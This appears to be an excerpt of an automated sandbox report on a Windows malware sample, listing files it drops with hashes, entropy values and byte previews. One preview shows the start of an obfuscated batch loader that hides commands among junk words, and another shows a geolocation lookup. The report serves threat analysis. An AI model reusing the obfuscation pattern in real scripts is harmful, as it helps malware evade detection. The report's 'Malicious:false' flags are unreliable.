                                                                                                                                                                                                                                SSDEEP:384:WehJ06HrpRD9HPmPuki09PrOa3HwwuBcozc/mwftIQXoSpu8888888888888888N:tD9vmPukxhSaAwuXc/mexy
                                                                                                                                                                                                                                MD5:597754DC836787DE4BAC9CF2DB5D3E34
                                                                                                                                                                                                                                SHA1:FE4C82D2A35E26222D58F1CE8F8C95D2091637D7
                                                                                                                                                                                                                                SHA-256:511364A6DEE2B2B1524DD4D1EF5D94A3FF70D7A24121EE38EA68E5820ECBA47D
                                                                                                                                                                                                                                SHA-512:7A26FECA330D14E237494D1B462C176D4844FF6DC874AF142B77AF7CC7C70B1CB999BBCB2F2BAC18B9250BEFF249459ECF8C69927A44A17B66A0B4714822E342
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:=........l....f.?.......?..........ZS .+?..............?..........Y..9.?m|1..~.?.-g....>.b./[E.?8..Q.S.>..7..K.?......>.....p?.[j3.H.>X.&.C.U?.x.....>Xzv...C?...*..?a.#wi#:=..........w.B..?.......?.........HO..3?........oX... ?..........%...?..#.Z.?."S-...>Q..!.r.?.M%....>.;....?.c..d3.>....$9t?..Jy...>.....A]?VJ...].>Q...I?...Z.I.?.7t.`............cH....?.......?........fY.eY.!...........,..d&@........#7.B.,.........=..U.&2@UUUUUU.@9.E4..7..........}..=m=@.......@. 8..B..[..[....u+E6.G@.......@......................@........................ZM..$^..........].>.=..@........Z..7...abK......Z...@...t...?..,......T..4s...a.g...@Xp.M...@.D.$_....n}in.....).M..@......@P(.*.C.. ...mz<.......@.E3.&...................I,+.............U&X>.?..........i....c4.........?.......?..N..T....j8.6..f*"!..?~w."...?nJ.R....1...7!.|.GD.|.?.......?...*.a..}. ..........?.pA..?...............................E.D;..?..........h7.r....=....(...r.?..EV.w.?.............0.SM`..

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Goal

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Og1SeeXcB2.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):49152
                                                                                                                                                                                                                                Entropy (8bit):4.696487128896818
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:m888888NfU84444QnoooooooooooooooooooooooYooootooooooooooooooYooC:iSGc
                                                                                                                                                                                                                                MD5:108D75E7972AAA42682547974686163A
                                                                                                                                                                                                                                SHA1:CC31C1FEB416557F1D4F4647000FDAED7DF6FD5E
                                                                                                                                                                                                                                SHA-256:44616AC50FB81013E90D95DF4AF787D0AAA70D8FF6F9B81F83FA4AAA03E9F97E
                                                                                                                                                                                                                                SHA-512:1B906DF98EAC64CC107C7837C8294C963A14DFE5E8EA619B35C0CD0C91C5EE78C6DB3B65919A3BBD2A694EA15356EFB490C45BF0EB2294459E457BF2E875F486
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.............................................................................................................................................................................................r...................................................................................................................................................................................r.r.r.r.r.r.r.r...............................................k.k.k.k.k.k.k.k.k.................................!.!.............................................................................................................................j.!.!.!.!.!.!.!.!...............................k...........!.r.........!.!.................................................r.r.....r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r...j.j.!..................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Hormone

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Og1SeeXcB2.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):63488
                                                                                                                                                                                                                                Entropy (8bit):4.57723913767573
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:wUsFxyLtVSQsbZgar3R/OWel3EYr8qcDP8WBosdq:whxjgarB/5el3EYrDWyuq
                                                                                                                                                                                                                                MD5:A13A0FD9A4EDB4290C8A0265F0DCE304
                                                                                                                                                                                                                                SHA1:A66FE66B666FCE86BCE99E1EED4AE972C67A81CD
                                                                                                                                                                                                                                SHA-256:700FA0779F67665A1C5737DDFED7C0A8AA42CDFDF76D660BB66F944FA47CA295
                                                                                                                                                                                                                                SHA-512:68EF1FAE3162B3E63694A579499C275823F88065481F63BCC065F3C0E656DFBB9060DD145BA55D76CD8B9B8F96FCB5CD225C16F93D00F804F8575553B1B19564
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:..text$np....3'..6....text$x.i'.......text$yd.....(.......text$zy........s....text$zz.............idata$5.............00cfg...........CRT$XCA.............CRT$XCAA............CRT$XCL........(....CRT$XCU.............CRT$XCZ.............CRT$XIA.............CRT$XIAA............CRT$XIAC............CRT$XIC.............CRT$XIZ.............CRT$XLA.............CRT$XLZ.............CRT$XPA.............CRT$XPX.............CRT$XPXA............CRT$XPZ.............CRT$XTA.............CRT$XTZ.... ...`G...rdata... ..P#...rdata$00....C.......rdata$T.....C..x....rdata$r....`E...L...rdata$zz... ...l....rdata$zzzdbg............rtc$IAA.............rtc$IZZ.............rtc$TAA.............rtc$TZZ.............tls.............tls$............tls$ZZZ.............xdata$x........h....idata$2............idata$3.............idata$4.........#...idata$6........p....data...p....9...data$00........(....data$dk00...........data$r.P........data$zz........X....bss....@#.......bss$00..5..`....bss$dk00... 6..l....bss$zz..P.

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Hwy

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Og1SeeXcB2.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1092), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):16911
                                                                                                                                                                                                                                Entropy (8bit):5.042090593897248
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:F0J6J98EveX+xAAPtChULsYFY7VocwlAj/AhbEatP9N:20J2EmRAVHLsYujOEatj
                                                                                                                                                                                                                                MD5:A08DB366FF5035C09967E0E421CF2177
                                                                                                                                                                                                                                SHA1:A0EDEED66CE1CDF044D7B9C169E0D8612A083514
                                                                                                                                                                                                                                SHA-256:42359E3C847A71813923214F4DC3A550ECFC71042339132C599339ECAA72C5C1
                                                                                                                                                                                                                                SHA-512:92E930F777A6D060623703892549AB414BC7A9EF83C633BB9D4F0D7091A375F98ABEDCA74007B325403FD10CBC562708BF80486F6905491A8CB336274A4DC20F
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:Set Surrey=w..RKsICamcorders Betty Ray Fleece ..cJfHUses Regime London Residents Surprising ..KYBenefit Levy Latino Luggage Exam Flower Display Apache ..DylpTranslations Usd ..HRTpCustomise Painful Asks Vat Realtor ..urKuJazz Mile Terrible Org Met Harmony Yugoslavia ..aMLExtremely Rest Nathan Novels Shoppingcom ..nTPine ..gTnOrbit Forge Trust Sur ..YnKEEvaluation ..Set Distinction=v..zQPmRealtors ..ifAllergy Davidson Dirty ..QqFBecome Anne Funeral Charter Illustrations Tactics Tabs ..SeqLa Same Destroy Aj Rates Spreading ..POMpAttached Oils Sponsored Olive Publish ..UDvCConclude Italic ..Set Criminal=f..GATiQui Shooting ..ZjWatched Diverse Shops Worked Fcc Sue Tariff Belong Size ..hTCeremony ..iXFMeasure ..bRpSurvive Align Fountain ..QEHValidation Twiki Emotional Occurrence Million ..dEuDFormation Patent Sustained Absorption Possibilities Mil Superior Pda ..Set Tribute=a..AvHInvestigate Special Linear Relocation Ad Increasingly Olive ..ekiGays Restrict Recruiting Volkswagen Gallery ..X

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Hwy.cmd (copy)

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1092), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):16911
                                                                                                                                                                                                                                Entropy (8bit):5.042090593897248
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:F0J6J98EveX+xAAPtChULsYFY7VocwlAj/AhbEatP9N:20J2EmRAVHLsYujOEatj
                                                                                                                                                                                                                                MD5:A08DB366FF5035C09967E0E421CF2177
                                                                                                                                                                                                                                SHA1:A0EDEED66CE1CDF044D7B9C169E0D8612A083514
                                                                                                                                                                                                                                SHA-256:42359E3C847A71813923214F4DC3A550ECFC71042339132C599339ECAA72C5C1
                                                                                                                                                                                                                                SHA-512:92E930F777A6D060623703892549AB414BC7A9EF83C633BB9D4F0D7091A375F98ABEDCA74007B325403FD10CBC562708BF80486F6905491A8CB336274A4DC20F
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:Set Surrey=w..RKsICamcorders Betty Ray Fleece ..cJfHUses Regime London Residents Surprising ..KYBenefit Levy Latino Luggage Exam Flower Display Apache ..DylpTranslations Usd ..HRTpCustomise Painful Asks Vat Realtor ..urKuJazz Mile Terrible Org Met Harmony Yugoslavia ..aMLExtremely Rest Nathan Novels Shoppingcom ..nTPine ..gTnOrbit Forge Trust Sur ..YnKEEvaluation ..Set Distinction=v..zQPmRealtors ..ifAllergy Davidson Dirty ..QqFBecome Anne Funeral Charter Illustrations Tactics Tabs ..SeqLa Same Destroy Aj Rates Spreading ..POMpAttached Oils Sponsored Olive Publish ..UDvCConclude Italic ..Set Criminal=f..GATiQui Shooting ..ZjWatched Diverse Shops Worked Fcc Sue Tariff Belong Size ..hTCeremony ..iXFMeasure ..bRpSurvive Align Fountain ..QEHValidation Twiki Emotional Occurrence Million ..dEuDFormation Patent Sustained Absorption Possibilities Mil Superior Pda ..Set Tribute=a..AvHInvestigate Special Linear Relocation Ad Increasingly Olive ..ekiGays Restrict Recruiting Volkswagen Gallery ..X

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].json

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):931
                                                                                                                                                                                                                                Entropy (8bit):4.986820407325773
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:tklrGndToUGkMyGWKyGXPVGArwY3P+aoHDGdAPORkoao9W7im51w7CN9jF6xIjSz:qlrqdTLauKyGX85y266m7WAxZ9
                                                                                                                                                                                                                                MD5:8FA06A7461C54F3A28161A927387438E
                                                                                                                                                                                                                                SHA1:71FAAF0ABA0FD4B12C7FCA03DC415B9278EAF54E
                                                                                                                                                                                                                                SHA-256:99D5C791E55CC6C937D92BF0708E8DB4F2EF047377C8A9B9B1A015CCC476145E
                                                                                                                                                                                                                                SHA-512:CCDECC6D1D1C2B960D31B676A2676FCE0D7C254361F41FCCD5735179CB81195E2F3E3DE7EC919A5B0098984E9E88866A201245930D59DB07E28B079863CAD0B0
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:{. "geoplugin_request":"81.181.60.92",. "geoplugin_status":206,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"",. "geoplugin_region":"",. "geoplugin_regionCode":"",. "geoplugin_regionName":"",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"",. "geoplugin_countryCode":"CH",. "geoplugin_countryName":"Switzerland",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"EU",. "geoplugin_continentName":"Europe",. "geoplugin_latitude":"47.1449",. "geoplugin_longitude":"8.1551",. "geoplugin_locationAccuracyRadius":"1000",. "geoplugin_timezone":"Europe\/Zurich",. "geoplugin_currencyCode":"CHF",. "geoplugin_currencySymbol":"CHF",. "geoplugin_currencySymbol_UTF8":"CHF",. "geoplugin_currencyConverter":0.9088.}

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Imports

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Og1SeeXcB2.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):78017
                                                                                                                                                                                                                                Entropy (8bit):7.997575482101774
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:1536:94fiigJXTDf/1Vgf22HTZgDm/HMIwEAZRiiJEHJPOk29qOk4kvrJ5bqOKNh+:9TigVf1Z2HTZgDm/DwEcRzJEBOn9I4s7
                                                                                                                                                                                                                                MD5:B1CA45983AD3737F17571D90105C6812
                                                                                                                                                                                                                                SHA1:E12A927C8577AF34931DF12313498538858145E7
                                                                                                                                                                                                                                SHA-256:C3E207C75F0773306412C63CEDD5465EC8B2A4B75A8B852EC763BA37B6045912
                                                                                                                                                                                                                                SHA-512:EF62485CE5C17824AD95B725CD088E50EFDC1EBCA13F540CD92F8E29286EB42D916805FC3E04F0158F920E3959818115EFF81F8F6BAD8B111DC1E06D5B4C1FC9
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:.../u.|r..Q..u..&y..T.;........cH....@...H........w#..n..~.p.JB!....$...E............{.H...!....z...W.+_Y. W..q...,...2..b3......Qe....4F..a{ v.....Ti......<.`\fgx..~Ey..C%....C.hRo...;iY_.KV....i....A.5:.}.;..........-......s.{.....;d....-.M.}.!F.u.i.....b ..>..6..1>......D.Lt#....]L.o>P..#...o..U....7.(.=..*....J.W.........}........N.B...$C.......]<.L.H.(...1.x.v~.}..6...../.4Dgp......?.....x...'.O...h..V`.X+..........t:.....i<.>...',......Tk.v...;....v....}......D.Y@......Yt.U.@G.V^...K...~..2\n.f/y.C.x......l....v..jZ.x...%......0.."..."y.O5.by.$.d....%..Y!..O....9...K+$..?.FQ..@c....1.@.......q&.c...S.I..x/N.Q.W...#....$"t...c...?..@L....6.C.U8.`.`.(,..3.lD.2\.J..<t..zT...\.,.7.pru...0(|...\.....W.`=...?...fB~...@......!..Q....!...\'.&%........PJ;.^..[Z.X.{_..-n].7d....>.........k..v..k3e...\.g.....B\k....S...#.....Q...Xf.k..Q..\..II&RA...~.M.-..Ip1-zEHIMf.l.O.....A.7 ..Xj.~ze8.$....!.S+(...!...G7.#..:F.....V..O

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Inclusive

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Og1SeeXcB2.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):28672
                                                                                                                                                                                                                                Entropy (8bit):6.440288771540654
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:nwGI9KgvoA3tnTnb+6h+HMU640L6wy4Za9uVtn3YcyxW2:w/Dde6YF640L6wy4Za9IN3YRj
                                                                                                                                                                                                                                MD5:D5B404D99B165EA552CB83B276DF8345
                                                                                                                                                                                                                                SHA1:AE69F78CD36D0BD0C9BEC3DFC4ED938FA75F8D6A
                                                                                                                                                                                                                                SHA-256:C44F28DF94A7F749DB47B044C0269197D7A71437E7391624A94E801C73CE89E3
                                                                                                                                                                                                                                SHA-512:351929F512A328D101C978079ADCEC5E7694B3CB6713CBCA712F5BE6A3A0103BDDA5E84A794261653A16908D5249D255BA5C79EA2A86C8D871E7EAD490634AD6
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:f......3.}.f......3.Cf9.tt.E....f........E.f.......E0P.Q......WV..L......u.Q..<.I.2.M0...._^..[].8........SP.......P.......P.......PQ....I..=.(M..u......f.......U..E(...u......SV.....t...........P.LJ.........E,...u...M ...u.......U$...u.j.Zj.Q.u.RQ.u..u.V.u.hT.I.P.u...6...M.....u.2....=.(M..u.f........^[].(.U..E(...@..S..#E(VW.....P.I....}.3.@P.E,Q.u.@.u$...u ...u.#E,.u.S.u.h..I.PW.t6...u.....u.2..@...t..M.QP....I..E.+E..G`.E.+E.Gdj.....I..FL3.@.=.(M..u.f......_^[..(.U..E(SV...W;.u...........P..I...M,;.u.......} ;.u.......]$;.u......3.3.BRQ.u.SW.u..u.PVhP.L.Q.u..5...M.....u.2..U.U.f92t'RV.5H.I.h....P..E.j.j.h.....0..M.3....=.(M..u.3.Bf......VSW.u..u.P....I.3.@_^[].(.U..$ .......E(SVW.....;.u.j.X.....P.>H...u,..;.u.. ........E(t.....E ;.u.......M$;.u......j.Q.u.QP.u..u.Rh..I.h..L.V.u...4...}.....u.2.......}(.t.j.j.h6...P..H.I......V3.Vh6...P..H.I..E.9.....t.j.VVVVV.7....I........u.5H.I..E.E..E......E.h.(M..E.P......P.=....tf......P.....E(........$..L.P.XO..YY.....

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Large

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Og1SeeXcB2.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):35840
                                                                                                                                                                                                                                Entropy (8bit):5.37936198626836
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:c3CAv2hl6v+L2q0uVGHj9/viMxYWD/gRHM1zzhWE7QxZaR82:sfv2j62SfuVGHj1vtK7h6R8an
                                                                                                                                                                                                                                MD5:5C0031E49707ADDDAC84958D9FE7D87E
                                                                                                                                                                                                                                SHA1:3F2707DA8132868FB17FBBFE524B49E3147649DE
                                                                                                                                                                                                                                SHA-256:A51D5A13DA08DA201CFA532DEC4C75CEE6E4262319181A55068D0602AB601AAA
                                                                                                                                                                                                                                SHA-512:7EA4EECDCDED1E7DD73A8DD743F1CFDC7EB741AF9E91302D63E9E616DE4ADEC8537F6443DF26B517B97B7E0C140A6B78B387DB43DFC4B3131C98A283758AA211
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:^[..U....S....V.E...E...W.}..E..U.........O....M..W ..tC;.s"....F..E......G;E.t....;.r.}.;.r...V..G....H;E.r....f.F.....;.s.f.....;O r._^[..U..V.r....W............L.........E.,K...........$...I......K.<.t.<.t.<.t.3...3.A3.;M.....X.........K.3..M.;.. cL....+E.....@.4.........K.3.9M.........K.........K.3.B... cL.;.t....t.3.3.;U......;.w=.........rr........... .....................................>... ..r8... ..........' ..v$..) ........../ ..tz.._ ..tr...0..tj......K.3..<. cL.............K.3.B... cL.;...B........9....._.-.........K....@.K....@.;.t...;.s.3.9E......E...3._^].I.6.I.].I...I...I...I...I...I.[.I...I.U..QQSVW.U..0^L..M.3......;.u.R....(..Y..t..U..M....^L.G..F..u..._^[.....U..QQSVW..y........f..toj]...E.\...^.E.[......f;U.u...q.j]Xf;.t.j\Xf;u.u.j]...^.)f;U.u.f9y.t*j[X....j]^...f;.t.f;.u.f9q.t.........f..u.3._^[..3...@..U..SV.u...W.....N.;.r.j..u....u..X'.......t..6..u.3.@_^[].3...SV... ..W.N<.<.;.~...;.}Y..+...d|P..?P......Y..u.j..>.F<..P.v.S.K]...F ...+F....~<....

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Lebanon

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Og1SeeXcB2.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):43008
                                                                                                                                                                                                                                Entropy (8bit):6.503287996555477
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:3NmoKzYkBRR9rlRmLmP/puCYmBLPrpmESmVamFqrxxU8tUYzaDD:ooKzYkBvRmLORuCYm9PrpmESvn+L
                                                                                                                                                                                                                                MD5:7D24837741341CAE2FF6E128F05C68BC
                                                                                                                                                                                                                                SHA1:C00D1210FD002ADAB7DCE03C83CCE4372E1272C8
                                                                                                                                                                                                                                SHA-256:DF71EC9EADEB3ACBB56EF804912ED4D00E2F6D6595835FC9E9AB822DD8D28610
                                                                                                                                                                                                                                SHA-512:5692138553CFB4E0BAB685F664C896B2ED7D71972424E8E8A55F46A0A74471AAC1F545C547ACA428A2B979FAAF2E1DF675A1B7583F988E36B32DF4102E10D553
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:.\.........3..d.....\......A..d...^.U..E.VW....`.....X.............`...9.`...u..w Pj...X....P........`...._^]...V..`.....t..v Pj...X...."........`....^.U..QQVj....<...YP...,........?.].9M.u..........3.9M....@........^..U..SV....M.Wj.[.~...i....S3.A+...R....u.!..FLjDWP.F..........jD......WP........j._...........u._^[]...U....VW..j....t......O...j..t............j..t.........Xy.....o..y..G..D..;GLu.jDj$X+....P.G.P..........u....a.........t9...t..u..E...y.....L..]..E.....L..3.............?.E..u................?.E..u..E..%.CL._^..V... ..............L..C...^=....|.........U.......SVW.....$....5....u...$....k...3...t.QQ..$.......0.>F;.r._^[..U.........SV...l...W.]..o...h.....K...YP.M.................3.3.W.s.F...3.u...5..h.sL..u..;"..YYQ.....L...P.u.....................T...P..\...P..d...P.E.P.u..G.......E.P......P.4.....d...P......P.._....T...P..\...P..d...P.E.P..L...P.......$..\...P......P._....T...P......P._....................t.j..:....E..3.E...VV.E.P..3...3.E..

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Master

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Og1SeeXcB2.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):21481
                                                                                                                                                                                                                                Entropy (8bit):7.306676250438361
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:lTHwWV8tnwmTihbn929MwO/ChZrzmZGhLdXVaeCVrVEVFJ8ZcGwGBk7/UMQ3rw:pByLiFuO/ChgZ45VatJVEV3GPkjF
                                                                                                                                                                                                                                MD5:0C55FD3803E15F8ECB82B7BE5B0B60B9
                                                                                                                                                                                                                                SHA1:36D65A1DF5322C44D19710ADE27D3630D85BB4B5
                                                                                                                                                                                                                                SHA-256:99AD54E17EB39ACC10F312DEC1C97F3304C9CA7A7AECE9445189C0A289A1E831
                                                                                                                                                                                                                                SHA-512:32E1370DD0DB29CABCD35B413344FDA56C5EFEF1791DDA9C27D4AD88C90B1A19C31B20D7C5882991DABA2AA03148E20CE68305490F89B42ED67092088F1BE060
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:2R2V2Z2^2b2f2j2n2r2v2z2~2.2.2.5.6.6?7.7!8;8U8o8.:J;Q;|>.>.>.>4?e?r?.?.?.?.?.?.?......0....0.0.010>0I0S0^0.1.1.2.2.2.2.2.2.2.2"2&2*2.22262V2Z2^2b2f2j2n2r2v2E3.3.3C4U4\4.4.4.425}5.5.5.5.6.646?6f6.6.6.6.6.6.6.6O7f7y7.7.7.7.7.7.7.7.8.8.9.9.9.9.9.:':1:?:I:W:^:i:p:{:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.;.;.;.;$;/;6;A;M;U;_;j;t;.;.;.;.<.<#<*<8<B<L<V<b<.<.<.<.<.<.<.=.=.=D=Z=p=.=.=<?G?N?\?g?n?y?.?......x....0.0$0,040<0D0.0.0[1b1.2.2.3.3.3.3.3.3.3.3.5.5.6.6.6.6.:.:$;{;.;.;.<$<V<b<r<.<.<.<.<.<.<.<.<.<.='=1=>=v=|=5>.>...........0.0R1{1.1.1.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.3.3-3Y3a3l3.3.3.4,4.4.4.4.4.4.4.4.4`5.5.5.6i6.6;7z7.7.7.989F9V9b9.:.;.;.;.=4=H=.>.>.?.?~?.?...........0.0=0v0.0.0.0.0.0.1.3.3;4D4N4T4Y4d4i4q4.4.5N5_5.5.5.5.5.6.686Z6l6.6.6.6.6.6C7w7.7.7.7.8.8+828a8.8.8.8.8.8.8.8.9$939:9P9x9.9.9.9.9.9":7:b:n:}:.:.:.:.:.:.:.:.;.;.;.<.<.<8<B<X<^<.<1=J=w=.=.=.=.=.=.=.=.>M>T>c>n>.>.>.?e?l?.?.?.?.?.?.?... .......0\0.0.0.0.1.1)1=1D1[1b1h1.1.1.1.1.1.1.1.1.1.1B2d2.3.3)313b3}3-4L4.4.435^5.5.5.5.696d6.6.6.6"7>7s7.

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Outlook

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Og1SeeXcB2.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):148480
                                                                                                                                                                                                                                Entropy (8bit):7.998746748115574
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:3072:PZIUVcALCJUp3LJF8mngWqvAnslxrGqfvs+3dHNmj:PFsiIm9qYsd0+Pmj
                                                                                                                                                                                                                                MD5:E2EE4C92015ABE2677396216A4FB86AC
                                                                                                                                                                                                                                SHA1:5ACD947F6C9CC607FECF5CE07929BB9EE9C24658
                                                                                                                                                                                                                                SHA-256:0A3BA8B374BAB00A7A25CFBC0D362BEC30A85A5C19167050A5902CC01B634C43
                                                                                                                                                                                                                                SHA-512:A53B4BD82197D1D9C520950A6B0E063C2BB2E95877246781453B3EC15C7D46510580DDC42A8C4E4991E7180037D5A902E195792F58B9A62FF57FDEB61916E55E
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:.\_.:..d..~"..@...Z./)..:.&.|?...'.o.WP.h.)hS.D. ..qD...dQ......7u..$..I.Z.c...3[..y..*.i...i0.)....'~*.o..+.c....-.}.........../._.=Q\y.,.J>.n...qB....G....Uu....]c.l>..Pa_a..W0t.>.]e"...g..F........G............f.k......(..1>+pMP..~h.........P..Q.....>.\....U.B........a...u........j..O{.T....X.......m.y=S.T.H.V.l.).XHI{.4H7...4..q.B..T..c.O.n..F |.E...0.6=|.p..;... .\...y<.}1=...c+."...N.{....}=..[=(..*oV.......4..)Ih....KR..[.;t.hsp...z!ERN.I........#...}%r.gE.${....G...C..I..7}.L|<....m.5.N5H3...aH'....t(..v..lLe(.......k|....+..%.i.:..X*.W....r).n..R.W.'v....GO.F_Z....(....aP.p,.x....a^.Y....J...&.)D.B#.hb...3..z{.....x.3W..=2.>...AM^=...=.M.....O......Q$|I.E...9}-a...;...G....Q.F..=....y.X....]........)J..~N...,.8.?....G.. lH...GJ+*..G..Z+j...C..GI% ..I.K.q.5.......+S.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Performs

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Og1SeeXcB2.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):41984
                                                                                                                                                                                                                                Entropy (8bit):6.269219511585888
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:npJsWVycd0vq6LqgaHbdMNkNDUzSLKPDvFQC7Vkr5M4INduPbOU7aI4k+:nHsWccd0vtmgMbFuz08QuklMBNIQ
                                                                                                                                                                                                                                MD5:2D29139B7632A63D796D2F98C7EDB7C9
                                                                                                                                                                                                                                SHA1:D5C8791BCBC6237E04525EB5C9AC9DF34DA19132
                                                                                                                                                                                                                                SHA-256:25D0C37D809DF03EA5B5ED99F83674928A62C0511F726D078BC6F7EFB723A0B1
                                                                                                                                                                                                                                SHA-512:F663F9E356EA64E3E0805973292DF438742D15248B5FC5DD9137BFAD108D9E38EEE990A686FB5BDAFD514744C9C4055D21C7FCD3A39EE455818AD72A85D755AC
                                                                                                                                                                                                                                Malicious:false
